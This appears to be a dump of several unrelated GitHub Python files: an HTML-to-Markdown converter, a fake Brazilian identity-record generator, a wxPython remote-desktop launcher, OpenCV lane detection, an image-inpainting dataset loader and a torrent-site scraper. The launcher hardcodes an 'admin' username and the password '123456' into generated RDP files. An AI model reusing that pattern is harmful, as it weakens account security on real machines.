\"24 SpellsM-O.html\",\n \"25 SpellsP-R.html\",\n \"26 SpellsS.html\",\n \"27 SpellsT-Z.html\",\n \"28 MagicItemsI.html\",\n \"29 MagicItemsII.html\",\n \"30 MagicItemsIII.html\",\n \"31 MagicItemsIV.html\",\n \"32 MagicItemsV.html\",\n \"33 MagicItemsVI.html\",\n \"34 MonstersIntro-A.html\",\n \"35 MonstersB-C.html\",\n \"36 MonstersD-De.html\",\n \"37 MonstersDi-Do.html\",\n \"38 MonstersDr-Dw.html\",\n \"39 MonstersE-F.html\",\n \"40 MonstersG.html\",\n \"41 MonstersH-I.html\",\n \"42 MonstersK-L.html\",\n \"43 MonstersM-N.html\",\n \"44 MonstersO-R.html\",\n \"45 MonstersS.html\",\n \"46 MonstersT-Z.html\",\n \"47 MonstersAnimals.html\",\n \"48 MonstersVermin.html\",\n \"49 TypesSubtypesAbilities.html\",\n \"50 Improving Monsters.html\",\n \"51 MonsterFeats.html\",\n \"52 MonstersasRaces.html\",\n \"53 CarryingandExploration.html\",\n \"54 Treasure.html\",\n \"55 WildernessandEnvironment.html\",\n \"56 Traps.html\",\n \"57 Planes.html\",\n \"58 PsionicRaces.html\",\n \"59 PsionicClasses.html\",\n \"60 PsionicSkills.html\",\n \"61 PsionicsFeats.html\",\n \"62 PowersOverview.html\",\n \"63 PowerList.html\",\n \"64 PsionicPowersA-C.html\",\n \"65 PsionicPowersD-F.html\",\n \"66 PsionicPowersG-P.html\",\n \"67 PsionicPowersQ-W.html\",\n \"68 PsionicMonsters.html\",\n \"69 PsionicItems.html\",\n \"70 PsionicSpells.html\",\n \"71 EpicLevelBasics.html\",\n \"72 EpicClasses.html\",\n \"73 EpicPrestigeClasses.html\",\n \"74 EpicSkills.html\",\n \"75 EpicFeats.html\",\n \"76 EpicSpells.html\",\n \"77 EpicMagicItems1.html\",\n \"78 EpicMagicItems2.html\",\n \"79 EpicMonsters(A-E).html\",\n \"80 EpicMonsters(G-W).html\",\n \"81 EpicObstacles.html\",\n \"82 DivineRanksandPowers.html\",\n \"83 DivineAbilitiesandFeats.html\",\n \"84 DivineDomainsandSpells.html\",\n \"85 DivineMinions.html\"\n]\n\n\nif __name__ == \"__main__\":\n for infile in FILES:\n print(\"Converting: \" + infile)\n outfile = infile.split('.')[0] + \".md\"\n inf = open(infile, \"r\")\n outf = open(outfile, \"w\")\n parser = MyHTMLParser()\n parser.setOutputFile(outf)\n parser.feed(inf.read())\n inf.close()\n outf.close()\n print(\"Done\")\n\n","repo_name":"orey/stuff","sub_path":"tools/file-conversions/html2md/html2md.py","file_name":"html2md.py","file_ext":"py","file_size_in_byte":8358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14875294695","text":"import random\nimport datetime\nimport requests\nimport buscacep\n\nclass Pessoa:\n\n def __init__(self):\n self.sexo = \"M\" if random.random() > 0.5 else \"F\"\n self.cpf = self.criarCPF()\n self.nome = self.gerarNome(self.sexo) if random.random() > 0.5 else ' '.join((self.gerarNome(self.sexo),self.gerarNome(self.sexo)))\n self.sobrenome = self.gerarSobrenome()\n self.data_nascimento = self.gerarDataNascimento()\n self.idade = abs(int(self.data_nascimento.split(\"-\")[0]) - datetime.datetime.now().year)\n self.telefone = self.gerarNumeroTelefone()\n self.geraEndereço()\n self.tipoSanguineo = ['A-', 'A+', 'B-', 'B+', 'AB-', 'AB+', 'O-', 'O+'][random.randrange(8)]\n \n def criarCPF(self):\n def calcula_digito(digs):\n s = 0\n qtd = len(digs)\n for i in range(qtd):\n s += n[i] * (1+qtd-i)\n res = 11 - s % 11\n if res >= 10: return 0\n return res \n n = [random.randrange(10) for i in range(9)]\n n.append(calcula_digito(n))\n n.append(calcula_digito(n))\n return ''.join(map(str, n))\n\n def gerarNome(self, sexo):\n file = 'nomes_masculinos.csv' if sexo == \"M\" else 'nomes_femininos.csv'\n rand = random.randint(0,1000)\n with open(file, 'r') as lista:\n for i, line in enumerate(lista):\n if i == rand:\n nome = line.split(',')[0].title()\n return nome \n\n def gerarSobrenome(self):\n rand = random.randrange(90) if random.random() > 0.5 else random.randrange(1800)\n with open('listadesobrenomesbrasileiros.txt', 'r', encoding = 'utf=8') as nomes:\n for i, line in enumerate(nomes):\n if i == rand:\n return line.split(',')[0]\n\n def gerarDataNascimento(self):\n return f\"{random.randrange(1970, 2002)}-{str(random.randrange(1,12)).zfill(2)}-{str(random.randrange(1,28)).zfill(2)}\"\n\n def gerarNumeroTelefone(self, fixo=False):\n tipo = '' if fixo else '9'\n numero = f'{tipo}'\n numero += str(random.randint(1,9))\n for n in range(7):\n numero += str(random.randint(0,9))\n return numero\n\n def geraEndereço(self):\n rand = random.randint(0,732763)\n with open(\"lista_ceps.txt\", \"r\", encoding=\"utf-8\") as ceps:\n for linha, cep in enumerate(ceps):\n if rand == linha:\n cep_aleatorio = cep\n \n endereço= buscacep.busca_cep_correios_as_dict(cep_aleatorio[:8])\n self.rua = endereço['logradouro']\n self.cidade, self.estado = endereço['localidade'].split(\"/\")\n self.bairro = endereço['bairro']\n self.cep = endereço['cep']\n self.numero = random.randint(1,700)\n\nif __name__ == \"__main__\":\n \n headers = {'content-type': 'application/json'}\n url = \"URL_POST\"\n for i in range(5):\n novaPessoa = Pessoa()\n dados = {\n \"nome\" : f\"{' '.join((novaPessoa.nome, novaPessoa.sobrenome))}\",\n \"sexo\" : f\"{novaPessoa.sexo}\",\n \"cpf\" : f\"{novaPessoa.cpf}\",\n \"idade\" : f\"{novaPessoa.idade}\",\n \"nascimento\" : f\"{novaPessoa.data_nascimento}\",\n \"telefone\" : f\"{novaPessoa.telefone}\",\n \"rua\" : f\"{novaPessoa.rua}\",\n \"número\": f\"{novaPessoa.numero}\",\n \"cidade\" : f\"{novaPessoa.cidade}\",\n \"bairro\" : f\"{novaPessoa.bairro}\",\n \"cep\" : f\"{novaPessoa.cep}\",\n \"tipo sanguíneo\" : f\"{novaPessoa.tipoSanguineo}\"\n }\n \n #r = requests.post(url, json=dados, headers=headers)\n print(dados)\n","repo_name":"AndreiZmk/python","sub_path":"01_gerar_pessoa_objeto.py","file_name":"01_gerar_pessoa_objeto.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35667238054","text":"# -*- coding:utf-8 -*-\nimport wx\nimport wx.lib.analogclock as ac\nimport wx.lib.agw.aquabutton as AB\nimport wx.gizmos as gizmos\nimport time\nimport random\nimport os\nimport sys\nimport binascii\nimport win32crypt,cmd\n\n\nu_pwd = unicode('123456')\npwdHash = win32crypt.CryptProtectData(u_pwd,u'',None,None,None,0)\npwd = 'password 51:b:' + binascii.hexlify(pwdHash).upper()\n\n\nuname = 'username:s:'\nkeys = ['IE6', 'IE7', 'IE8', 'IE9', 'IE10', 'win32IE11', 'win64IE11']\n\nfor mname in keys:\n if not os.path.exists('./rdp/'+mname+'.rdp'):\n model = open('./model/'+mname+'.txt')\n mdate = model.read()\n new = open('./rdp/'+mname+'.rdp', 'w')\n new.write(mdate)\n new.write(uname+\"admin\")\n new.write(\"\\n\")\n new.write(pwd)\n new.close()\n\n\n\nclass Mytime(wx.Panel):\n #时钟方法,然后添加到boxsizer中\n def __init__(self,parent):\n wx.Panel.__init__(self,parent)\n self.SetBackgroundColour(\"blue\")\n \n #时钟效果\n led = gizmos.LEDNumberCtrl(self,-1,(0,0),(300,50),gizmos.LED_ALIGN_CENTER)\n self.clock = led\n self.timer = wx.Timer(self)\n self.timer.Start(1000)\n self.Bind(wx.EVT_TIMER,self.OnTimer)\n \n def OnTimer(self,evt):\n t = time.localtime(time.time())\n st = time.strftime(\"%I-%M-%S\",t)\n self.clock.SetValue(st)\n\nclass MyButton(wx.Panel):\n #-------------远程链接按钮---------------------------------------------------------\n def __init__(self,parent):\n \"\"\"\"\"\"\n wx.Panel.__init__(self,parent,-1)\n self.SetBackgroundColour(wx.Colour(0,255,255))\n\n box = wx.BoxSizer(wx.VERTICAL)\n font = wx.Font(18, wx.DECORATIVE, wx.ITALIC, wx.NORMAL)\n #按钮数据\n self.date={\"IE6\":\"./rdp/IE6.rdp\",\n \"IE7\":\"./rdp/IE7.rdp\",\n \"IE8\":\"./rdp/IE8.rdp\",\n \"IE9\":\"./rdp/IE9.rdp\",\n \"IE10\":\"./rdp/IE10.rdp\",\n \"32IE11\":\"./rdp/win32IE11.rdp\",\n \"64IE11\":\"./rdp/win64IE11.rdp\"}\n #循环输出按钮\n self.buttonid={}\n for buttonname in self.date:\n \n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255) \n \n btn = AB.AquaButton(self,-1,None,buttonname)\n box.Add(btn,1,wx.EXPAND |wx.EAST| wx.WEST,5)\n btn.SetBackgroundColor(wx.Colour(r,g,b))\n btn.SetHoverColor(wx.Colour(g,r,b))\n btn.SetForegroundColour(\"black\")\n btn.SetFont(font)\n self.Bind(wx.EVT_BUTTON, self.OnClick, btn)\n self.buttonid[btn.GetId()]= buttonname\n self.SetSizer(box)\n \n def OnClick(self,evt):\n ip = self.date[self.buttonid[evt.GetId()]]\n os.system(\"mstsc %s /console \" % ip)\n \n \nclass MyFrame(wx.Frame):\n def __init__(self):\n wx.Frame.__init__(self,None,- 1, u\"远程链接\", size=(300,450),style=wx.DEFAULT_FRAME_STYLE)\n #self.SetBackgroundColour('black')\n #设置程序图标\n self.SetMaxSize((300,500))\n self.ICON = wx.Icon(\"2.ico\",wx.BITMAP_TYPE_ICO)\n self.SetIcon(self.ICON)\n \n mytime = Mytime(self)\n mybutton = MyButton(self)\n \n box = wx.BoxSizer(wx.VERTICAL)\n box.Add(mytime,-1,wx.EXPAND|wx.ALL)\n box.Add(mybutton,2,wx.EXPAND|wx.ALL)\n self.SetSizer(box)\n \n self.taskBarIcon = TaskBarIcon(self)\n self.Bind(wx.EVT_CLOSE,self.OnClose)\n self.Bind(wx.EVT_ICONIZE,self.OnIconfiy)\n \n \n\n \n #点击最小化时,隐藏界面,到托盘 \n def OnIconfiy(self,event):\n self.Hide()\n \n #点击关闭时,隐藏界面,到托盘 \n def OnClose(self,event):\n self.Hide()\n \n########################################################################\nclass TaskBarIcon(wx.TaskBarIcon):\n #最小化托盘\n\n #--------------ID----------------------------------------------\n ID_Abuout = wx.NewId()\n ID_MainFrame = wx.NewId()\n ID_Exit = wx.NewId()\n '''\n ID_IE6 = wx.NewId()\n ID_IE7 = wx.NewId()\n ID_IE8 = wx.NewId()\n ID_IE9 = wx.NewId()\n ID_IE10 = wx.NewId()\n ID_IE3211 = wx.NewId()\n ID_IE6411 = wx.NewId()\n '''\n \n #---------------不同机器对应的IP,和菜单栏的ID----------------------\n date={\"IE6\":6,\n \"IE7\":7,\n \"IE8\":8,\n \"IE9\":9,\n \"IE10\":10,\n \"32IE11\":11,\n \"64IE11\":12} \n date1={6:\"./rdp/IE6.rdp\",\n 7:\"./rdp/IE7.rdp\",\n 8:\"./rdp/IE8.rdp\",\n 9:\"./rdp/IE9.rdp\",\n 10:\"./rdp/IE10.rdp\",\n 11:\"./rdp/win32IE11.rdp\",\n 12:\"./rdp/win64IE11.rdp\"} \n \n def __init__(self,frame):\n wx.TaskBarIcon.__init__(self)\n \n self.SetMainFrame(frame) \n self.Bind(wx.EVT_TASKBAR_LEFT_DCLICK,self.OnTaskBarLeftDClick)\n self.Bind(wx.EVT_MENU, self.OnMainFrame, id=self.ID_MainFrame)\n self.Bind(wx.EVT_MENU, self.OnExit, id=self.ID_Exit)\n \n \n def SetMainFrame(self, frame):\n self.frame = frame\n self.SetIcon(wx.Icon(\"2.ico\",type=wx.BITMAP_TYPE_ICO),u\"远程链接\")\n\n def OnTaskBarLeftDClick(self,event):\n if self.frame.IsIconized():\n self.frame.Iconize(False)\n if not self.frame.IsShown():\n self.frame.Show(True)\n self.frame.Raise()\n \n def OnMainFrame(self,event): \n #显示主面板\n if not self.frame.IsShown():\n self.frame.Show(True)\n self.frame.Raise()\n \n #------------------------------------- \n def OnExit(self,event):\n #��闭程序\n wx.Exit()\n \n def CreatePopupMenu(self):\n #添加最小化菜单\n self.menu = wx.Menu()\n \n self.menu.Append(self.ID_MainFrame, u\"主面板\")\n self.menu.AppendSeparator()\n self.Bind(wx.EVT_MENU,self.ConnectIE,id =self.ID_MainFrame)\n \n for key in self.date:\n if key:\n self.menu.Append(self.date[key],key)\n self.Bind(wx.EVT_MENU,self.ConnectIE, id=self.date[key])\n \n self.menu.AppendSeparator()\n self.menu.Append(self.ID_Exit, u\"退出\")\n return self.menu\n \n def ConnectIE(self, event):\n #托盘处链接远程机\n ip = self.date1[event.GetId()]\n os.system(\"mstsc %s /console\" % ip)\n \n\n \n\n \n \n \nif __name__ == '__main__':\n app = wx.App()\n fram = MyFrame()\n fram.Show()\n app.MainLoop()\n \n","repo_name":"willcaty/Remote-Connection","sub_path":"wanghao.py","file_name":"wanghao.py","file_ext":"py","file_size_in_byte":6789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31357513803","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 1 07:43:49 2018\n\n@author: Krishna mohan\n\"\"\"\n\nimport cv2, numpy as np, math\n\ndef resize(image):\n return cv2.resize(image, (700, 500))\nimage = resize(cv2.imread(\"road.jpg\"))\n\ndef show_img(image):\n #print_size(image)\n cv2.imshow('my_pic', image)\n cv2.waitKey(30000)\n cv2.destroyAllWindows()\n \nHSV_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\nshow_img(image)\nshow_img(HSV_image)\n\n\ndef maskHSV(img):\n lower_red = np.array([0,0,180])\n upper_red = np.array([150,200,255])\n \n mask = cv2.inRange(img, lower_red, upper_red)\n return cv2.bitwise_and(img, img, mask = mask)\n \n\ndef getLanes(HSV_image, image):\n lanes = maskHSV(HSV_image)\n return lanes;\n\nlanes = getLanes(HSV_image, image)\nshow_img(lanes)\n\n\ngray = cv2.cvtColor(lanes, cv2.COLOR_RGB2GRAY)\n\nshow_img(gray)\n\n#roi = gray[220:, :]\n#roi = cv2.setImageROI(gray, [220:, :])\n\n\n\n\n\n\n\n\n\n\n\ndef selectROI(image):\n rows, cols = image.shape[:2]\n lower_left = [680, 220]\n lower_right = [680, 500]\n top_left = [5, 220]\n top_right = [5, 500]\n \n \n vertices = np.array([[lower_left, top_left, top_right, lower_right]], dtype=np.int32)\n \n mask = np.zeros_like(image)\n \n if len(mask.shape) == 2:\n cv2.fillPoly(mask, vertices, 255)\n else:\n cv2.fillPoly(mask, vertices, (255,)*mask.shape[2]) # in case, the input image has a channel dimension \n return cv2.bitwise_or(image, mask)\n \n \nroi = selectROI(image)\n#roi = image[250:500, 0:700]\nprint(\"ROI\")\nshow_img(roi)\nrows, cols = roi.shape[:2]\nsrc = np.float32([[0, cols], [cols, rows], [0, 0], [rows, 0]])\ndst = np.float32([[250, 300], [250, 500], [0, 0], [0, 700]])\n#dst = src\n\nM = cv2.getPerspectiveTransform(src, dst)\nwarped_img = cv2.warpPerspective(roi, M, (cols, rows))\nshow_img(warped_img)\n\n\n\n\n\n\n\n\n\n\n\n#blur = cv2.GaussianBlur(roi, (5,5),0)\n\n#show_img(blur)\n\n'''\n\nedges = cv2.Canny(roi, 50, 150)\nshow_img(edges)\n\nlines = cv2.HoughLinesP(edges, 1, np.pi/180, 100, minLineLength=150, maxLineGap=250)\n\n\n\nfor i in lines:\n x1, y1, x2, y2 = i[0]\n \n #if (x1 < 20 and x2 > 689) or (x1 > 140 and x2 > 600) and (x2-x1 > 50 or y2-y1 > 120):\n if y1 != y2:\n if y1-y2 > 40 or y2-y1 > 40:\n print(i)\n print(math.sqrt(((x2-x1)**2)+((y2-y1)**2)))\n cv2.line(image,(x1,y1),(x2,y2),(0,255,0),2)\n show_img(image)\n'''\n\n\n\nrows, cols = roi.shape[:2]\n\n","repo_name":"krishnardt/AutoDrive","sub_path":"Lanes.py","file_name":"Lanes.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23149562473","text":"import os\r\nimport cv2\r\nimport math\r\nimport numpy as np\r\nfrom torch.utils.data import Dataset\r\nimport os.path\r\nimport random\r\nimport torchvision.transforms as transforms\r\nimport torch\r\nfrom utils import make_dataset\r\nfrom PIL import Image, ImageDraw\r\n\r\n\r\nclass Image_Editing_Dataset(Dataset):\r\n def __init__(self, cfg, dataset_root, split='train', dataset_name=''):\r\n self.split = split\r\n self.cfg = cfg\r\n self.dataset_name = dataset_name\r\n\r\n self.dir_img = os.path.join(dataset_root, self.split, 'images')\r\n self.dir_lab = os.path.join(dataset_root, self.split, 'labels')\r\n self.dir_ins = os.path.join(dataset_root, self.split, 'inst_map')\r\n name_list = os.listdir(self.dir_img)\r\n self.name_list = [n[:-4] for n in name_list if n.endswith('jpg')]\r\n \r\n if self.split == 'test':\r\n self.name_list.sort()\r\n \r\n self.predefined_mask_path = 'data/predefined_mask/'\r\n mask_list = os.listdir(self.predefined_mask_path)\r\n mask_list.sort()\r\n self.mask_list = mask_list[:len(self.name_list)]\r\n\r\n def __getitem__(self, index):\r\n name = self.name_list[index]\r\n # input data\r\n img = cv2.imread(os.path.join(self.dir_img, name + '.jpg'))\r\n lab = cv2.imread(os.path.join(self.dir_lab, name + '.png'), 0)\r\n\r\n if self.dataset_name == 'cityscapes':\r\n inst_map = Image.open(os.path.join(self.dir_ins, name + '.png'))\r\n inst_map = np.array(inst_map, dtype=np.int32)\r\n elif self.dataset_name == 'ADE20k-room':\r\n inst_map = cv2.imread(os.path.join(self.dir_ins, name + '.png'))\r\n inst_map = inst_map[:, :, 1]\r\n \r\n if self.split == 'train':\r\n # resize\r\n size = (self.cfg['crop_size'], self.cfg['crop_size'])\r\n h, w, _ = img.shape\r\n w_l = 0\r\n h_l = 0\r\n if w > 256:\r\n w_l = random.randint(0, w - 256)\r\n if h > 256:\r\n h_l = random.randint(0, h - 256)\r\n \r\n img = img[h_l:h_l+256, w_l:w_l+256]\r\n lab = lab[h_l:h_l+256, w_l:w_l+256]\r\n if self.dataset_name == 'ADE20k-room' or self.dataset_name == 'cityscapes':\r\n inst_map = inst_map[h_l:h_l+256, w_l:w_l+256]\r\n # flip\r\n if random.random() > 0.5:\r\n img = np.flip(img,axis=1).copy()\r\n lab = np.flip(lab,axis=1).copy()\r\n if self.dataset_name == 'ADE20k-room' or self.dataset_name == 'cityscapes':\r\n inst_map = np.flip(inst_map,axis=1).copy()\r\n \r\n # select inst id\r\n if self.dataset_name == 'cityscapes':\r\n inst_ids = np.unique(inst_map)\r\n inst_ids = inst_ids.tolist()\r\n inst_ids = [i for i in inst_ids if i>=1000] # filter out non-instance masks\r\n elif self.dataset_name == 'ADE20k-room':\r\n inst_ids = np.unique(inst_map)\r\n inst_ids = inst_ids.tolist()\r\n\r\n if self.dataset_name == 'ADE20k-room' or self.dataset_name == 'cityscapes':\r\n no_inst = False\r\n if len(inst_ids) == 0:\r\n no_inst = True\r\n else:\r\n selected_inst_id = random.choice(inst_ids)\r\n \r\n lab_ori = lab.copy()\r\n \r\n lab_ids = np.unique(lab)\r\n lab_ids = lab_ids.tolist()\r\n selected_lab_id = random.choice(lab_ids)\r\n \r\n img = get_transform(img)\r\n lab = get_transform(lab, normalize=False)\r\n lab = lab * 255.0\r\n \r\n if self.split == 'train':\r\n mask_type = index % 5\r\n if self.dataset_name == 'ADE20k-landscape':\r\n mask_type = index % 4\r\n # \r\n if mask_type == 0:\r\n mask = brush_stroke_mask()\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n elif mask_type == 1:\r\n mask = self.load_right_mask(self.cfg['crop_size'])\r\n elif mask_type == 2:\r\n mask = self.load_center_mask(self.cfg['crop_size'], split='train')\r\n elif mask_type == 3:\r\n mask = np.array(np.equal(lab_ori, selected_lab_id).astype(np.uint8))\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n elif mask_type == 4:\r\n if not no_inst:\r\n mask = np.zeros((256, 256), np.float32)\r\n ys,xs = np.where(inst_map==selected_inst_id)\r\n ymin, ymax, xmin, xmax = ys.min(), ys.max(), xs.min(), xs.max()\r\n mask[ymin:ymax, xmin:xmax] = 1\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n else:\r\n mask = brush_stroke_mask()\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n \r\n else:\r\n mask = cv2.imread(os.path.join(self.predefined_mask_path, self.mask_list[index]), 0) / 255\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n \r\n mask = torch.from_numpy(mask)\r\n masked_img = img * (1. - mask)\r\n\r\n inst_map = inst_map.reshape((1,) + inst_map.shape).astype(np.float32)\r\n inst_map = torch.from_numpy(inst_map)\r\n \r\n return {'img': img, 'masked_img': masked_img, 'lab': lab, 'mask': mask, 'inst_map': inst_map, 'name': name}\r\n # 'mask_seam': mask_seam,\r\n\r\n def __len__(self):\r\n \"\"\"Return the total number of images in the dataset.\"\"\"\r\n return len(self.name_list)\r\n\r\n def load_center_mask(self, crop_size, split): \r\n # rect\r\n height, width = crop_size, crop_size\r\n mask = np.ones((height, width), np.float32)\r\n if split == 'test':\r\n mask[64:192, 64:192] = 0.\r\n w1 = 64\r\n w2 = 64 + 128\r\n h1 = 64\r\n h2 = 64 + 128\r\n else:\r\n w1 = random.randint(32, 96)\r\n w2 = w1 + 128\r\n h1 = random.randint(32, 96)\r\n h2 = h1 + 128\r\n mask[h1:h2, w1:w2] = 0. # edited region is 1, non-edited region is 0\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n\r\n return mask\r\n\r\n def load_right_mask(self, img_shapes, mask_rate=0.5):\r\n height, width = img_shapes, img_shapes\r\n mask = np.zeros((height, width), np.float32)\r\n\r\n mask_length = int(width * mask_rate) # masked length\r\n w1 = width - mask_length\r\n mask[:, w1:] = 1. # edited region is 1, non-edited region is 0\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n\r\n return mask\r\n\r\n def load_seam_mask(self, img_shapes, box):\r\n m = 16\r\n height, width = img_shapes, img_shapes\r\n mask1 = np.ones((height, width), np.float32)\r\n mask2 = np.zeros((height, width), np.float32)\r\n \r\n mask1[box[0]+m:box[1]-m, box[2]+m:box[3]-m] = 0.\r\n mask2[box[0]-m:box[1]+m, box[2]-m:box[3]+m] = 1.\r\n \r\n mask = mask1 * mask2\r\n mask = mask.reshape((1,) + mask.shape).astype(np.float32)\r\n\r\n return torch.from_numpy(mask)\r\n\r\n\r\ndef get_transform(img, normalize=True):\r\n transform_list = []\r\n\r\n transform_list += [transforms.ToTensor()]\r\n if normalize:\r\n transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\r\n return transforms.Compose(transform_list)(img)\r\n\r\ndef brush_stroke_mask(H=256, W=256):\r\n min_num_vertex = 4\r\n max_num_vertex = 8\r\n mean_angle = 2 * math.pi / 5\r\n angle_range = 2 * math.pi / 15\r\n min_width = 50\r\n max_width = 140\r\n\r\n average_radius = math.sqrt(H * H + W * W) / 8\r\n mask = Image.new('L', (W, H), 0)\r\n\r\n num_vertex = random.randint(min_num_vertex, max_num_vertex)\r\n angle_min = mean_angle - random.uniform(0, angle_range)\r\n angle_max = mean_angle + random.uniform(0, angle_range)\r\n angles = []\r\n vertex = []\r\n for i in range(num_vertex):\r\n if i % 2 == 0:\r\n angles.append(2 * math.pi - random.uniform(angle_min, angle_max))\r\n else:\r\n angles.append(random.uniform(angle_min, angle_max))\r\n\r\n h, w = mask.size\r\n vertex.append((int(random.randint(0, w)), int(random.randint(0, h))))\r\n for i in range(num_vertex):\r\n r = np.clip(\r\n np.random.normal(loc=average_radius, scale=average_radius // 2),\r\n 0, 2 * average_radius)\r\n new_x = np.clip(vertex[-1][0] + r * math.cos(angles[i]), 0, w)\r\n new_y = np.clip(vertex[-1][1] + r * math.sin(angles[i]), 0, h)\r\n vertex.append((int(new_x), int(new_y)))\r\n\r\n draw = ImageDraw.Draw(mask)\r\n width = int(random.uniform(min_width, max_width))\r\n draw.line(vertex, fill=1, width=width)\r\n for v in vertex:\r\n draw.ellipse((v[0] - width // 2,\r\n v[1] - width // 2,\r\n v[0] + width // 2,\r\n v[1] + width // 2),\r\n fill=1)\r\n\r\n if np.random.normal() > 0:\r\n mask.transpose(Image.FLIP_LEFT_RIGHT)\r\n if np.random.normal() > 0:\r\n mask.transpose(Image.FLIP_TOP_BOTTOM)\r\n \r\n mask = np.asarray(mask, np.float32)\r\n\r\n return mask\r\n\r\ndef get_mask_edge(mask):\r\n edge = cv2.Canny(mask, 0, 1)\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(20, 20))\r\n edge_mask = cv2.dilate(edge,kernel)\r\n \r\n return edge_mask","repo_name":"WuyangLuo/SPMPGAN","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":9447,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"13089713048","text":"import re\nfrom urllib.parse import urljoin\n\nfrom sickchill import logger\nfrom sickchill.helper.common import convert_size\nfrom sickchill.oldbeard import helpers, tvcache\nfrom sickchill.oldbeard.bs4_parser import BS4Parser\nfrom sickchill.providers.torrent.TorrentProvider import TorrentProvider\n\n\nclass Provider(TorrentProvider):\n def __init__(self):\n super().__init__(\"Newpct\")\n\n self.onlyspasearch = None\n\n self.url = \"http://www.newpct.com\"\n self.urls = {\"search\": urljoin(self.url, \"index.php\")}\n\n self.cache = tvcache.TVCache(self, min_time=20)\n\n def search(self, search_strings, age=0, ep_obj=None):\n \"\"\"\n Search query:\n http://www.newpct.com/index.php?l=doSearch&q=fringe&category_=All&idioma_=1&bus_de_=All\n q => Show name\n category_ = Category 'Shows' (767)\n idioma_ = Language Spanish (1), All\n bus_de_ = Date from (All, mes, semana, ayer, hoy)\n \"\"\"\n results = []\n\n # Only search if user conditions are true\n lang_info = \"\" if not ep_obj or not ep_obj.show else ep_obj.show.lang\n\n search_params = {\"l\": \"doSearch\", \"q\": \"\", \"category_\": \"All\", \"idioma_\": 1, \"bus_de_\": \"All\"}\n\n for mode in search_strings:\n items = []\n logger.debug(_(\"Search Mode: {mode}\").format(mode=mode))\n\n if self.onlyspasearch:\n search_params[\"idioma_\"] = 1\n else:\n search_params[\"idioma_\"] = \"All\"\n\n # Only search if user conditions are true\n if self.onlyspasearch and lang_info != \"es\" and mode != \"RSS\":\n logger.debug(\"Show info is not spanish, skipping provider search\")\n continue\n\n search_params[\"bus_de_\"] = \"All\" if mode != \"RSS\" else \"semana\"\n\n for search_string in {*search_strings[mode]}:\n if mode != \"RSS\":\n logger.debug(_(\"Search String: {search_string}\").format(search_string=search_string))\n\n search_params[\"q\"] = search_string\n\n data = self.get_url(self.urls[\"search\"], params=search_params, returns=\"text\")\n if not data:\n continue\n\n with BS4Parser(data) as html:\n torrent_table = html.find(\"table\", id=\"categoryTable\")\n torrent_rows = torrent_table(\"tr\") if torrent_table else []\n\n # Continue only if at least one Release is found\n if len(torrent_rows) < 3: # Headers + 1 Torrent + Pagination\n logger.debug(\"Data returned from provider does not contain any torrents\")\n continue\n\n # 'Fecha', 'Título', 'Tamaño', ''\n # Date, Title, Size\n labels = [label.get_text(strip=True) for label in torrent_rows[0](\"th\")]\n for row in torrent_rows[1:-1]:\n try:\n cells = row(\"td\")\n\n torrent_row = row.find(\"a\")\n download_url = torrent_row.get(\"href\", \"\")\n title = self._processTitle(torrent_row.get(\"title\", \"\"), download_url)\n if not all([title, download_url]):\n continue\n\n # Provider does not provide seeders/leechers\n seeders = 1\n leechers = 0\n # 2 is the 'Tamaño' column.\n torrent_size = cells[2].get_text(strip=True)\n\n size = convert_size(torrent_size) or -1\n item = {\"title\": title, \"link\": download_url, \"size\": size, \"seeders\": seeders, \"leechers\": leechers, \"hash\": \"\"}\n if mode != \"RSS\":\n logger.debug(_(\"Found result: \") + f\"{title}\")\n\n items.append(item)\n except (AttributeError, TypeError):\n continue\n\n results += items\n\n return results\n\n def get_url(self, url, post_data=None, params=None, timeout=30, **kwargs):\n \"\"\"\n returns='content' when trying access to torrent info (For calling torrent client). Previously we must parse\n the URL to get torrent file\n \"\"\"\n trickery = kwargs.pop(\"returns\", \"\")\n if trickery == \"content\":\n kwargs[\"returns\"] = \"text\"\n data = super().get_url(url, post_data=post_data, params=params, timeout=timeout, **kwargs)\n url = re.search(r\"http://tumejorserie.com/descargar/.+\\.torrent\", data, re.DOTALL).group()\n url = urljoin(self.url, url.rsplit(\"=\", 1)[-1])\n\n kwargs[\"returns\"] = trickery\n return super().get_url(url, post_data=post_data, params=params, timeout=timeout, **kwargs)\n\n def download_result(self, result):\n \"\"\"\n Save the result to disk.\n \"\"\"\n\n # check for auth\n if not self.login():\n return False\n\n urls, filename = self._make_url(result)\n\n for url in urls:\n # Search results don't return torrent files directly, it returns show sheets so we must parse showSheet to access torrent.\n data = self.get_url(url, returns=\"text\")\n url_torrent = re.search(r\"http://tumejorserie.com/descargar/.+\\.torrent\", data, re.DOTALL).group()\n\n if url_torrent.startswith(\"http\"):\n self.headers.update({\"Referer\": \"/\".join(url_torrent.split(\"/\")[:3]) + \"/\"})\n\n logger.info(\"Downloading a result from {0}\".format(url))\n\n if helpers.download_file(url_torrent, filename, session=self.session, headers=self.headers):\n if self._verify_download(filename):\n logger.info(\"Saved result to {0}\".format(filename))\n return True\n else:\n logger.warning(\"Could not download {0}\".format(url))\n helpers.remove_file_failed(filename)\n\n if urls:\n logger.warning(\"Failed to download any results\")\n\n return False\n\n 